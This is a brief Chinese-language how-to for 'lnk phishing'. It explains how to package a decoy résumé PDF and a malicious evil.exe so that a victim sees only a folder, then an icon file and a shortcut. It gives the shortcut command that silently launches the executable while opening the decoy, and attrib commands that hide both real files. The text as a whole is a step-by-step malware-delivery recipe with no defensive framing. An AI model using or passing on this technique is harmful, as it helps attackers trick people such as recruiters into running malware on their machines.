lnk钓鱼实践

准备一个正常的a.pdf和恶意exe b.exe和pdf icon文件

目的:制作一个压缩包,压缩包里只显示一个文件夹(缓解受害者直接在压缩包里看到pdf然后点击,不管lnk文件)

解压后只有一个ico文件(伪装成其它)和一个lnk文件,真实的pdf和exe进行隐藏。

点击lnk会打开pdf并打开exe。

lnk制作:

C:\Windows\System32\cmd.exe /c start /b evil.exe & 张广彬-java开发工程师.pdf

文件隐藏

attrib +h +s .\张广彬-java开发工程师.pdf
attrib +h +s .\evil.exe